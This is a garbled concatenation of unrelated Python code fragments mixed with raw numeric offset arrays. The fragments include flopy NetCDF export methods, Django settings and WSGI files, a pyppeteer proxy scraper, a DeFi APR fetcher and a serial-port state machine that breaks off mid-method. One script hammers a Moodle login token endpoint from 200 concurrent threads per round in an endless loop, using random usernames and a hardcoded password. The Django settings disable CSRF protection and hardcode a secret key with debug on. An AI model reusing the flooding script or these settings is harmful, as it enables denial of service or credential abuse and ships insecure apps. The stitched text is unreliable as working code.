and name in self.nc.variables.keys()
):
if self.forgive:
self.logger.warn(
"skipping duplicate variable: {0}".format(name)
)
return
else:
raise Exception("duplicate variable name: {0}".format(name))
if name in self.nc.variables.keys():
raise Exception("duplicate variable name: {0}".format(name))
self.log("creating variable: " + str(name))
assert (
precision_str in PRECISION_STRS
), "netcdf.create_variable() error: precision string {0} not in {1}".format(
precision_str, PRECISION_STRS
)
if self.nc is None:
self.initialize_file()
# check that the requested dimension exists and
        # build up the chunk sizes
# chunks = []
# for dimension in dimensions:
# assert self.nc.dimensions.get(dimension) is not None, \
# "netcdf.create_variable() dimension not found:" + dimension
# chunk = self.chunks[dimension]
# assert chunk is not None, \
# "netcdf.create_variable() chunk size of {0} is None in self.chunks". \
# format(dimension)
# chunks.append(chunk)
self.var_attr_dict[name] = attributes
var = self.nc.createVariable(
name,
precision_str,
dimensions,
fill_value=self.fillvalue,
zlib=True,
) # ,
# chunksizes=tuple(chunks))
for k, v in attributes.items():
try:
var.setncattr(k, v)
            except Exception:
                self.logger.warn(
                    "error setting attribute "
                    + "{0} for variable {1}".format(k, name)
)
self.log("creating variable: " + str(name))
return var
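    # Usage sketch (hypothetical names and dimensions, not from the original
    # source):
    #   attribs = {"units": "m", "long_name": "simulated head"}
    #   v = self.create_variable("head", attribs, precision_str="f4",
    #                            dimensions=("time", "layer", "y", "x"))
    #   v[:] = head_array  # array shape must match the declared dimensions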
def add_global_attributes(self, attr_dict):
""" add global attribute to an initialized file
Parameters
----------
attr_dict : dict(attribute name, attribute value)
Returns
-------
None
Raises
------
        Exception if self.nc is None (initialize_file()
has not been called)
"""
if self.nc is None:
# self.initialize_file()
mess = (
"NetCDF.add_global_attributes() should only "
+ "be called after the file has been initialized"
)
self.logger.warn(mess)
raise Exception(mess)
self.log("setting global attributes")
self.nc.setncatts(attr_dict)
self.log("setting global attributes")
def add_sciencebase_metadata(self, id, check=True):
"""Add metadata from ScienceBase using the
flopy.export.metadata.acdd class.
Returns
-------
metadata : flopy.export.metadata.acdd object
"""
md = acdd(id, model=self.model)
if md.sb is not None:
if check:
self._check_vs_sciencebase(md)
# get set of public attributes
attr = {n for n in dir(md) if "_" not in n[0]}
# skip some convenience attributes
skip = {
"bounds",
"creator",
"sb",
"xmlroot",
"time_coverage",
"get_sciencebase_xml_metadata",
"get_sciencebase_metadata",
}
towrite = sorted(list(attr.difference(skip)))
for k in towrite:
v = md.__getattribute__(k)
if v is not None:
# convert everything to strings
if not isinstance(v, str):
if isinstance(v, list):
v = ",".join(v)
else:
v = str(v)
self.global_attributes[k] = v
self.nc.setncattr(k, v)
self.write()
return md
def _check_vs_sciencebase(self, md):
"""Check that model bounds read from flopy are consistent with those in ScienceBase."""
xmin, ymin, xmax, ymax = self.bounds
tol = 1e-5
assert md.geospatial_lon_min - xmin < tol
assert md.geospatial_lon_max - xmax < tol
assert md.geospatial_lat_min - ymin < tol
assert md.geospatial_lat_max - ymax < tol
assert md.geospatial_vertical_min - self.vbounds[0] < tol
assert md.geospatial_vertical_max - self.vbounds[1] < tol
def get_longnames_from_docstrings(self, outfile="longnames.json"):
"""
This is experimental.
Scrape Flopy module docstrings and return docstrings for parameters
included in the list of variables added to NetCdf object. Create
a dictionary of longnames keyed by the NetCdf variable names; make each
longname from the first sentence of the docstring for that parameter.
One major limitation is that variables from mflists often aren't described
in the docstrings.
"""
def startstop(ds):
"""Get just the Parameters section of the docstring."""
start, stop = 0, -1
for i, l in enumerate(ds):
if "Parameters" in l and "----" in ds[i + 1]:
start = i + 2
if l.strip() in ["Attributes", "Methods", "Returns", "Notes"]:
stop = i - 1
break
if i >= start and "----" in l:
stop = i - 2
break
return start, stop
def get_entries(ds):
"""Parse docstring entries into dictionary."""
stuff = {}
k = None
for line in ds:
if (
len(line) >= 5
and line[:4] == " " * 4
and line[4] != " "
and ":" in line
):
k = line.split(":")[0].strip()
stuff[k] = ""
# lines with parameter descriptions
elif k is not None and len(line) > 10: # avoid orphans
stuff[k] += line.strip() + " "
return stuff
# get a list of the flopy classes
# packages = inspect.getmembers(flopy.modflow, inspect.isclass)
packages = [(pp.name[0], pp) for pp in self.model.packagelist]
# get a list of the NetCDF variables
attr = [v.split("_")[-1] for v in self.nc.variables]
# parse docstrings to get long names
longnames = {}
for pkg in packages:
# parse the docstring
obj = pkg[-1]
ds = obj.__doc__.split("\n")
start, stop = startstop(ds)
txt = ds[start:stop]
if stop - start > 0:
params = get_entries(txt)
for k, v in params.items():
if k in attr:
longnames[k] = v.split(". ")[0]
# add in any variables that weren't found
for var in attr:
if var not in longnames.keys():
longnames[var] = ""
with open(outfile, "w") as output:
json.dump(longnames, output, sort_keys=True, indent=2)
return longnames
| [
[
[
7,
9
],
[
430,
432
],
[
4753,
4755
],
[
4876,
4878
],
[
14922,
14924
],
[
17006,
17008
],
[
23256,
23258
]
],
[
[
17,
25
],
[
23185,
23193
]
],
[
[
33,
39
],
[
23112,
23118
]
],
[
[
47,
51
],
[
2546,
2550
]
],
[
[
59,
63
],
[
519,
523
],
[
51899,
51903
]
],
[
[
71,
82
],
[
7300,
7302
],
[
7340,
7342
],
[
8056,
8058
],
[
8096,
8098
],
[
8812,
8814
],
[
8852,
8854
],
[
9644,
9646
],
[
9690,
9692
],
[
9730,
9732
],
[
12207,
12209
],
[
12255,
12257
],
[
13963,
13965
],
[
14049,
14051
],
[
19051,
19053
],
[
19204,
19206
],
[
19292,
19294
],
[
19349,
19351
],
[
19431,
19433
],
[
19519,
19521
],
[
20404,
20406
],
[
20449,
20451
],
[
20953,
20955
],
[
21037,
21039
],
[
26451,
26453
],
[
28422,
28424
],
[
28461,
28463
],
[
29207,
29209
],
[
30322,
30324
],
[
33662,
33664
],
[
37575,
37577
],
[
39245,
39247
],
[
39980,
39982
],
[
40332,
40334
]
],
[
[
104,
112
],
[
1568,
1576
],
[
1906,
1914
],
[
2764,
2772
],
[
14856,
14864
],
[
15084,
15092
],
[
28230,
28238
]
],
[
[
120,
124
],
[
14844,
14848
],
[
15072,
15076
]
],
[
[
147,
151
],
[
47555,
47559
]
],
[
[
159,
164
],
[
28145,
28150
],
[
32949,
32954
]
],
[
[
176,
185
],
[
14098,
14107
],
[
20656,
20665
],
[
20875,
20884
],
[
20973,
20982
],
[
21064,
21073
],
[
24092,
24101
]
],
[
[
197,
203
]
],
[
[
313,
327
],
[
42177,
42191
],
[
42348,
42362
],
[
45118,
45132
],
[
45245,
45259
]
],
[
[
350,
363
],
[
5377,
5390
],
[
10883,
10896
],
[
41524,
41537
],
[
44440,
44453
]
],
[
[
423,
427
],
[
467,
471
]
],
[
[
496,
497
],
[
529,
530
]
],
[
[
503,
516
],
[
29993,
30006
],
[
30498,
30511
],
[
31038,
31051
],
[
31587,
31600
],
[
32097,
32110
],
[
32596,
32609
],
[
33465,
33478
],
[
33915,
33928
],
[
34646,
34659
],
[
38713,
38726
]
],
[
[
540,
546
],
[
4659,
4665
]
],
[
[
2933,
2939
],
[
7265,
7271
],
[
7561,
7567
],
[
8021,
8027
],
[
8317,
8323
],
[
8777,
8783
],
[
9073,
9079
],
[
9607,
9613
],
[
9971,
9977
],
[
10526,
10532
],
[
10590,
10596
],
[
12975,
12981
],
[
13307,
13313
],
[
18270,
18276
]
]
] |
# -*- coding: utf-8 -*-
from .Enviopack import Enviopack
from .Auth.Auth import Auth
from .Quote.Quote import Quote
from .Pickings.Pickings import Pickings
from .Orders.Orders import Orders
__version__ = "0.4.6"
__author__ = "Federico Gobea"
| [
[
[
47,
56
]
],
[
[
80,
84
]
],
[
[
110,
115
]
],
[
[
147,
155
]
],
[
[
183,
189
]
],
[
[
191,
202
]
],
[
[
213,
223
]
]
] |
"""
WSGI config for billsengine_31836 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'billsengine_31836.settings')
application = get_wsgi_application()
| [
[
[
240,
242
],
[
295,
297
]
],
[
[
273,
293
],
[
388,
408
]
],
[
[
374,
385
]
]
] |
import requests
import threading
import random
import json
usernames = json.loads(open("usernames.json", "r").read())
password = '%4B%65%6E%79%6F%6E%35%25'  # A percent-encoded (URL-encoded) password
siteurl = '192.168.122.61'
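# Summary of what follows: run() picks a random username and requests a Moodle
# mobile-app token from `siteurl`; the loop below then spawns `numthreads`
# daemon threads per iteration, starts them all, and joins them before looping.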
def run():
username = random.choice(usernames)
token = requests.get('http://' + siteurl + '/login/token.php?username=' + username + '&password=' + password + '&service=moodle_mobile_app').json()["token"]
print(f'{token}')
while True:
#run()
#"""
numthreads = 200
threads = []
for i in range(numthreads):
t = threading.Thread(target = run)
t.daemon = True
threads.append(t)
for i in range(numthreads):
threads[i].start()
for i in range(numthreads):
threads[i].join()
#""" | [
[
[
7,
15
],
[
273,
281
]
],
[
[
23,
32
],
[
559,
568
]
],
[
[
40,
46
],
[
236,
242
]
],
[
[
54,
58
],
[
72,
76
]
],
[
[
60,
69
],
[
250,
259
]
],
[
[
119,
127
],
[
365,
373
]
],
[
[
182,
189
],
[
298,
305
]
],
[
[
214,
217
],
[
585,
588
]
],
[
[
481,
491
],
[
534,
544
],
[
659,
669
],
[
718,
728
]
],
[
[
502,
509
],
[
622,
629
],
[
680,
687
],
[
739,
746
]
],
[
[
523,
524
]
],
[
[
555,
556
],
[
598,
599
],
[
637,
638
]
],
[
[
648,
649
],
[
688,
689
]
],
[
[
707,
708
],
[
747,
748
]
]
] |
import pytest
from autogluon.core.space import Categorical
from autogluon.vision._gluoncv import ObjectDetection
def get_dataset(path):
return ObjectDetection.Dataset.from_voc(path)
@pytest.mark.skip(reason="ObjectDetector is not stable to test, and fails due to transient errors occasionally.")
def test_object_detection_estimator():
dataset = get_dataset('https://autogluon.s3.amazonaws.com/datasets/tiny_motorbike.zip')
train_data, val_data, test_data = dataset.random_split(val_size=0.3, test_size=0.2, random_state=0)
task = ObjectDetection({'num_trials': 1, 'epochs': 1, 'batch_size': 4})
detector = task.fit(train_data)
assert task.fit_summary().get('valid_map', 0) > 0
test_result = detector.predict(test_data)
@pytest.mark.skip(reason="ObjectDetector is not stable to test, and fails due to transient errors occasionally.")
def test_object_detection_estimator_transfer():
dataset = get_dataset('https://autogluon.s3.amazonaws.com/datasets/tiny_motorbike.zip')
train_data, val_data, test_data = dataset.random_split(val_size=0.3, test_size=0.2, random_state=0)
task = ObjectDetection({'num_trials': 1, 'epochs': 1, 'transfer': Categorical('yolo3_darknet53_coco', 'ssd_512_resnet50_v1_voc'), 'estimator': 'ssd', 'batch_size': 4})
detector = task.fit(train_data)
assert task.fit_summary().get('valid_map', 0) > 0
test_result = detector.predict(test_data)
| [
[
[
7,
13
],
[
192,
198
],
[
755,
761
]
],
[
[
48,
59
],
[
1182,
1193
]
],
[
[
98,
113
],
[
150,
165
],
[
551,
566
],
[
1123,
1138
]
],
[
[
120,
131
],
[
358,
369
],
[
930,
941
]
],
[
[
309,
340
]
],
[
[
872,
912
]
]
] |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import asyncio
import pyppeteer
import time
import os
import random
from exe_js import js1, js3, js4, js5
# http://www.mamicode.com/info-detail-2302923.html
# https://segmentfault.com/a/1190000011627343
"""
{
proxy: "127.0.0.1:1234",
proxy-auth: "userx:passx",
proxy-type: "meh"
}
"""
def input_time_random():
return random.randint(300, 500)
async def main():
print("in main ")
print(os.environ.get('PYPPETEER_CHROMIUM_REVISION'))
browser = await pyppeteer.launch(
executablePath=r"D:\A\Desktop\项目+更新\node_project\chrome-win\chrome-win\chrome.exe",
headless=False,
args=[
'--proxy-server=118.24.156.214:8118'
],
timeout=30000)
page = await browser.newPage()
await page.setViewport({"width": 1000, "height": 780})
await page.setUserAgent("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36")
await page.goto('http://httpbin.net/ip')
    # await page.waitForNavigation({'waitUntil': 'load'})  # sometimes not needed
content = await page.content()
cookies = await page.cookies()
await page.screenshot({'path': 'example.png'})
dimensions = await page.evaluate('''() => {
return {
width: document.documentElement.clientWidth,
height: document.documentElement.clientHeight,
deviceScaleFactor: window.devicePixelRatio,
}
}''')
print(dimensions)
await browser.close()
return {'content': content, 'cookies': cookies}
asyncio.get_event_loop().run_until_complete(main()) | [
[
[
49,
56
],
[
1593,
1600
]
],
[
[
64,
73
],
[
520,
529
]
],
[
[
81,
85
]
],
[
[
93,
95
],
[
453,
455
]
],
[
[
103,
109
],
[
376,
382
]
],
[
[
129,
132
]
],
[
[
134,
137
]
],
[
[
139,
142
]
],
[
[
144,
147
]
],
[
[
344,
361
]
],
[
[
403,
1590
],
[
1637,
1641
]
]
] |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_yamdb.settings')
application = get_wsgi_application()
| [
[
[
7,
9
],
[
62,
64
]
],
[
[
40,
60
],
[
147,
167
]
],
[
[
133,
144
]
]
] |
"""
Django settings for bingo project.
Generated by 'django-admin startproject' using Django 3.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'templates')
STATIC_DIR = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@k0#p3kidu)yaaa3u1hplxz)f@^6xiy384*(+n@@s5x#1bx@m5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'quiz',
'teacher',
'student',
'widget_tweaks',
'channels',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CSRF_COOKIE_SECURE=False
ROOT_URLCONF = 'bingo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bingo.wsgi.application'
ASGI_APPLICATION = 'bingo.asgi.application'
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [("localhost", 6379)],
},
},
}
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
LOGIN_REDIRECT_URL='/afterlogin'
#for contact us give your gmail id and password
EMAIL_BACKEND ='django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'xyz.gmail.com'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST_USER = 'from@gmail.com' # this email will be used to send emails
EMAIL_HOST_PASSWORD = 'xyz' # host email password required
# now sign in with your host gmail account in your browser
# open following link and turn it ON
# https://myaccount.google.com/lesssecureapps
# otherwise you will get SMTPAuthenticationError at /contactus
# this process is required because google blocks apps authentication by default
EMAIL_RECEIVING_USER = ['to@gmail.com'] # email on which you will receive messages sent from website
| [
[
[
313,
315
],
[
400,
402
],
[
416,
418
],
[
432,
434
],
[
475,
477
],
[
521,
523
],
[
564,
566
],
[
2690,
2692
]
],
[
[
389,
397
],
[
488,
496
],
[
534,
542
],
[
577,
585
],
[
2703,
2711
]
],
[
[
460,
472
],
[
1856,
1868
]
],
[
[
510,
520
],
[
3583,
3593
]
],
[
[
553,
563
]
],
[
[
800,
810
]
],
[
[
933,
938
]
],
[
[
947,
960
]
],
[
[
994,
1008
]
],
[
[
1281,
1291
]
],
[
[
1695,
1713
]
],
[
[
1720,
1732
]
],
[
[
1749,
1758
]
],
[
[
2247,
2263
]
],
[
[
2291,
2307
]
],
[
[
2336,
2350
]
],
[
[
2595,
2604
]
],
[
[
2840,
2864
]
],
[
[
3343,
3356
]
],
[
[
3368,
3377
]
],
[
[
3387,
3395
]
],
[
[
3404,
3412
]
],
[
[
3421,
3427
]
],
[
[
3539,
3549
]
],
[
[
3564,
3580
]
],
[
[
3599,
3617
]
],
[
[
3681,
3694
]
],
[
[
3742,
3752
]
],
[
[
3771,
3784
]
],
[
[
3792,
3802
]
],
[
[
3809,
3824
]
],
[
[
3885,
3904
]
],
[
[
4229,
4249
]
]
] |
from zenml.steps import BaseStepConfig
class PreTrainingConfigs(BaseStepConfig):
# The configuration for the pre-training of the agent
ENV_NAME: str = "BreakoutDeterministic-v4"
WRITE_TENSORBOARD: bool = True
TENSORBOARD_DIR: str = "tensorboard/"
LEARNING_RATE: float = 0.00001
INPUT_SHAPE: tuple = (84, 84)
BATCH_SIZE: int = 32
SAVE_PATH = "breakout-saves"
USE_PER: bool = False
MEM_SIZE: int = 100
LOAD_FROM: str = None
LOAD_REPLAY_BUFFER: bool = True
MAX_NOOP_STEPS: int = 2000
TOTAL_FRAMES: int = 3000
FRAMES_BETWEEN_EVAL: int = 100000
MAX_EPISODE_LENGTH: int = 18000
    EVAL_LENGTH: int = 10000  # Number of frames to evaluate for
    PRIORITY_SCALE: float = 0.7  # How much the replay buffer should sample based on priorities. 0 = complete random samples, 1 = completely aligned with priorities
    CLIP_REWARD: bool = True  # Any positive reward is +1, and negative reward is -1, 0 is unchanged
    UPDATE_FREQ: int = 4  # Number of actions between gradient descent steps
    DISCOUNT_FACTOR: float = 0.99  # Gamma, how much to discount future rewards
    MIN_REPLAY_BUFFER_SIZE = 50000  # The minimum size the replay buffer must be before we start to update the agent
| [
[
[
24,
38
],
[
69,
83
]
],
[
[
50,
68
]
]
] |
import educative.course1.stacks_queues.stack as s
input_data = [23, 60, 12, 42, 4, 97, 2]
expected_output_data = [2, 4, 12, 23, 42, 60, 97]
# This solution uses a second stack
# 1. until input stack is not empty, we pop the top value and compare it
# with the top value of the second stack
# 2. if value >= top of stack 2, we push the popped value onto stack 2
# 3. else while popped value < top of stack 2, we keep pushing top of stack 2 to stack 1
# 4. finally when stack 2 is empty we push the popped value and start over again
# 5. The output will be a sorted stack
# ---------------------------------------------
# NOTE - This can also be done by recursion ---
# ---------------------------------------------
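# Illustrative trace (added for clarity, not in the original) on a small stack
# pushed in the order 3, 1, 2 (so 2 is on top):
#   pop 2 -> stack 2 empty, push 2          stack 2: [2]
#   pop 1 -> 1 < 2, move 2 back, push 1     stack 2: [1],    stack 1: [3, 2]
#   pop 2 -> 2 >= 1, push 2                 stack 2: [1, 2]
#   pop 3 -> 3 >= 2, push 3                 stack 2: [1, 2, 3] (sorted, top = 3)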
def sort_stack_1(stack):
result = s.Stack(stack.capacity, True) # suppress_printing = True
while not stack.is_empty():
value = stack.pop()
if not result.is_empty() and value >= int(result.peek()):
result.push(value)
else:
while not result.is_empty() and value < int(result.peek()):
stack.push(result.pop())
result.push(value)
return result.prettify()
def main():
input_stack = s.Stack(len(input_data), True) # suppress_printing = True
[input_stack.push(x) for x in input_data]
expected_output_stack = s.Stack(len(expected_output_data), True) # suppress_printing = True
[expected_output_stack.push(x) for x in expected_output_data]
print("Input: \n" + str(input_stack.prettify()))
print("Expected: \n" + str(expected_output_stack.prettify()))
print("Output: \n" + str(sort_stack_1(input_stack)))
if __name__ == '__main__':
main()
| [
[
[
7,
49
],
[
757,
758
],
[
1193,
1194
],
[
1326,
1327
]
],
[
[
51,
61
],
[
1205,
1215
],
[
1285,
1295
]
],
[
[
91,
111
],
[
1338,
1358
],
[
1438,
1458
]
],
[
[
723,
735
],
[
1609,
1621
]
],
[
[
1167,
1171
],
[
1670,
1674
]
]
] |
from __future__ import print_function
from __future__ import division
| [
[
[
23,
37
]
],
[
[
62,
70
]
]
] |
# Author: Denys Makogon
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glanceclient.v2 import client as glanceclient
from keystoneauth1 import loading
from keystoneauth1 import session
from keystoneclient import client as keystoneclient
from novaclient import client as novaclient
from neutronclient.v2_0 import client as neutronclient
class OpenStackClients(object):
__keystone = None
__nova = None
__neutron = None
__glance = None
def __password_session_setup(self, node):
creds = node.runtime_properties['auth_properties']
if 'region_name' in creds:
del creds['region_name']
loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(**creds)
sess = session.Session(auth=auth)
return sess
def keystone(self, node):
if self.__keystone is None:
self.__keystone = keystoneclient.Client(**node.properties)
self.__keystone.authenticate()
return self.__keystone
def nova(self, node):
if self.__nova is None:
version = node.properties['compute_api_version']
use_connection_pool = node.properties['use_connection_pool']
self.__nova = novaclient.Client(
version, session=self.__password_session_setup(node),
connection_pool=use_connection_pool)
return self.__nova
def neutron(self, node):
if self.__neutron is None:
self.__neutron = neutronclient.Client(
session=self.__password_session_setup(node))
return self.__neutron
def glance(self, node):
if self.__glance is None:
self.__glance = glanceclient.Client(
session=self.__password_session_setup(node))
return self.__glance
openstack = OpenStackClients()
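# Usage sketch (hypothetical: `node` must carry the properties and
# runtime_properties that the methods above read):
#   nova_client = openstack.nova(node)        # built lazily on first call
#   neutron_client = openstack.neutron(node)  # clients are cached on the singleton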
| [
[
[
630,
652
],
[
2231,
2243
]
],
[
[
680,
687
],
[
1184,
1191
]
],
[
[
714,
721
],
[
1286,
1293
]
],
[
[
749,
773
],
[
1430,
1444
]
],
[
[
798,
818
],
[
1764,
1774
]
],
[
[
850,
873
],
[
2027,
2040
]
],
[
[
882,
898
],
[
2356,
2372
]
],
[
[
2344,
2353
]
]
] |
from abc import abstractmethod
from .apr_fetcher import APRFetcher
from typing import Dict, List, Union, Any
from .dapp_apr_fetcher import DappAPRFetcher
from .utils.utils import (
calculate_lp_token_price,
get_block_average_time,
get_token_price_from_dexs,
open_contract,
usdt_address,
platform_name_mapping,
decimals_mapping,
symbol_mapping
)
class MasterchefAPRFetcher(DappAPRFetcher):
"""
Interface for data-fetching based APR fetcher
"""
@abstractmethod
def masterchef_address(self):
raise NotImplementedError()
@abstractmethod
def dapp_token_address_field(self):
raise NotImplementedError()
@abstractmethod
def dapp_token_per_block_or_per_second_field(self, per_block: bool) -> str:
raise NotImplementedError()
@abstractmethod
    def _total_staked(self, pool_id, pool_info):
        raise NotImplementedError()
    @abstractmethod
    def _pool_address(self, pool_id, pool_info):
        raise NotImplementedError()
    @abstractmethod
    def _alloc_point(self, pool_id, pool_info):
raise NotImplementedError()
def dapp_token_address(self, web3) -> str:
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
return getattr(masterchef_contract.functions, self.dapp_token_address_field())().call()
def dapp_pools_infos(self, web3) -> List[Dict[str, Union[str, float]]]:
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
d = []
for i in range(masterchef_contract.functions.poolLength().call()):
pool_info = masterchef_contract.functions.poolInfo(i).call()
d.append({
"total_staked": self._total_staked(i, pool_info),
"pool_address": self._pool_address(i, pool_info),
"alloc_point": self._alloc_point(i, pool_info),
})
return d
def dapp_token_per_year(self, web3) -> float:
field_per_second = self.dapp_token_per_block_or_per_second_field(per_block=False)
masterchef_contract = open_contract(self._web3, self._blockchain, self.masterchef_address())
token_contract = open_contract(web3, self._blockchain, self.dapp_token_address(web3))
decimals = token_contract.functions.decimals().call()
if field_per_second is None or field_per_second == "":
average_time_per_block_seconds = get_block_average_time(web3, span=100)
block_per_seconds = 1.0 / average_time_per_block_seconds
block_per_year = block_per_seconds * 3600 * 24 * 365
            token_per_block = getattr(masterchef_contract.functions, self.dapp_token_per_block_or_per_second_field(per_block=True))().call()
annual_token_emission = block_per_year * (token_per_block/(10**decimals))
else:
annual_token_emission = getattr(masterchef_contract.functions, field_per_second)().call() * 10**(-decimals) * 3600 * 24 * 365
return annual_token_emission
def dapp_token_total_alloc(self, web3) -> int:
total_alloc = sum([p["alloc_point"] for p in self.dapp_pools_infos(web3)])
return total_alloc
def dapp_token_price(self, web3) -> float:
return get_token_price_from_dexs(web3, self._blockchain, self.dapp_token_address(web3))
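# Hypothetical subclass sketch (illustrative only; the contract address and
# field names below are made up): a concrete fetcher mainly has to name its
# masterchef contract and describe how to unpack its poolInfo tuples.
#
#   class ExampleMasterchefAPRFetcher(MasterchefAPRFetcher):
#       def masterchef_address(self):
#           return "0x0000000000000000000000000000000000000000"
#       def dapp_token_address_field(self):
#           return "rewardToken"
#       def dapp_token_per_block_or_per_second_field(self, per_block: bool) -> str:
#           return "rewardPerBlock" if per_block else ""
#       def _total_staked(self, pool_id, pool_info):
#           return pool_info[0]
#       def _pool_address(self, pool_id, pool_info):
#           return pool_info[1]
#       def _alloc_point(self, pool_id, pool_info):
#           return pool_info[2]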
| [
[
[
16,
30
],
[
499,
513
],
[
590,
604
],
[
687,
701
],
[
824,
838
],
[
921,
935
],
[
1018,
1032
]
],
[
[
56,
66
]
],
[
[
86,
90
],
[
1399,
1403
]
],
[
[
92,
96
],
[
1394,
1398
]
],
[
[
98,
103
],
[
1409,
1414
]
],
[
[
105,
108
]
],
[
[
139,
153
],
[
406,
420
]
],
[
[
185,
209
]
],
[
[
215,
237
],
[
2451,
2473
]
],
[
[
243,
268
],
[
3251,
3276
]
],
[
[
274,
287
],
[
1186,
1199
],
[
1460,
1473
],
[
2116,
2129
],
[
2212,
2225
]
],
[
[
293,
305
]
],
[
[
311,
332
]
],
[
[
338,
354
]
],
[
[
360,
374
]
],
[
[
385,
405
]
]
] |
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
QUIZZES_URL = reverse('questionary:quiz-list')
class PublicQuizzesApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login required for retrieving quizzes"""
res = self.client.get(QUIZZES_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED) | [
[
[
24,
32
],
[
220,
228
]
],
[
[
57,
64
],
[
157,
164
]
],
[
[
93,
99
],
[
518,
524
]
],
[
[
132,
141
],
[
322,
331
]
],
[
[
143,
154
],
[
462,
473
]
],
[
[
198,
219
]
]
] |
###############################################################################
# Author: CallMeCCLemon
# Date: 2019
# Copyright: 2019 Thomas Littlejohn (@CallMeCCLemon) - Modified BSD License
###############################################################################
from enum import Enum
from PythonApp.pillar.MessageClient import MessageClient
from PythonApp.pillar.PillarMessageTransformer import PillarMessageTransformer
from PythonApp.qc_serial.SerialDao import SerialDao
from PythonApp.qc_serial.SerialUtil import SerialUtil
from PythonApp.qc_serial.model.HeaderMessage import HeaderMessage
from PythonApp.qc_serial.model.OpCode import OpCode
from PythonApp.qc_serial.model.PayloadMessage import PayloadMessage
from PythonApp.util.Config import Config
class States(Enum):
DISCONNECTED = 0
CONNECTED = 1
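# Protocol summary (restating the handlers below, no new behavior):
#   DISCONNECTED: send a HELO header and wait for an ACK; on ACK switch to
#                 CONNECTED, on timeout or a malformed header stay put and retry.
#   CONNECTED:    send DUMPQ plus a payload carrying PillarType, expect a DUMPA
#                 header and payload, forward it to the queue via MessageClient,
#                 mark done, and fall back to DISCONNECTED.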
class SerialStateMachine:
def __init__(self, serial_dao: SerialDao):
self.active_state = States.DISCONNECTED
self.config = Config()
self.states = {
States.DISCONNECTED: self.disconnected,
States.CONNECTED: self.connected,
}
self.serial_dao = serial_dao
self.message_client = MessageClient()
self.header_message_length = 11
self.done = False
def run(self):
while not self.done:
self.states[self.active_state]()
def disconnected(self):
        # Send HELO messages, waiting for an ACK.
hello_message = HeaderMessage(
OpCode.HELO,
0,
int(self.config.get_master_config_value("PillarID")),
0)
self.serial_dao.write(hello_message.to_serial_payload())
message = self.serial_dao.read(self.header_message_length)
try:
SerialUtil.validate_message_header(message)
except TimeoutError as ex:
return
except ValueError as ex:
print(ex)
return
header_message = HeaderMessage.build_header_object(message[1:])
